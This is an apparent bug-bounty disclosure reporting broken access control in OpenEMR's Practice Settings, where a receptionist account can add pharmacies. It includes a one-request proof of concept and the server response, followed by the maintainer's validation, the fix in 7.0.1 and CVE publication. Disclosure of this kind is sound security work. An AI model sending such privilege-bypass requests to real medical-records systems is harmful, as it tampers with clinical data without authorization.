Broken Access Controls in Pratice settings in openemr/openemr


Reported on

Dec 26th 2022


We observed that a receptionist user can add a Pharmacy in the Pratice Settings section, although this area is restricted to receptionist users.

Proof of Concept


POST /openemr/controller.php?practice_settings&pharmacy&action=edit HTTP/1.1
Cookie: OpenEMR=<receptionist user's cookie>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 144



HTTP/1.1 302 Found
Server: nginx/1.21.1
Date: Mon, 26 Dec 2022 09:02:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /openemr/controller.php?practice_settings&pharmacy&action=list
Content-Length: 9246

<!DOCTYPE html>
    <title>Practice Settings</title>

<meta charset="utf-8" />

PoC Image


After we send the request above image

there is a new pharmacy added image


This vulnerability allows a front desk user to add any pharmacy, which could break the logic of the application.

We are processing your report and will contact the openemr team within 24 hours. a year ago
We have contacted a member of the openemr team and are waiting to hear back a year ago
openemr/openemr maintainer has acknowledged this report a year ago
Brady Miller validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller
a year ago


This is fixed is in master branch at

@Nhien.IT, @admin, I am unable to mark this as fixed, since that requires hard-setting a publish date, which I am unable to safely predict. We plan to release OpenEMR 7.0.1 in about 3-4 weeks, which will include this fix. At that time (after release OpenEMR 7.0.1), we will then mark this issue as fixed (and publish at that time with a cve).

thanks for the report @Nhien.IT !

a year ago


Hi @maintainer,

Thanks for your effort, I hope to publish a fix version soon.


7 months ago


Hi @maintainer,

I have received mail about 7.0.1 version being published.Any update here?

Brady Miller marked this as fixed in 7.0.1 with commit bb4244 7 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Brady Miller published this vulnerability 7 months ago
to join this conversation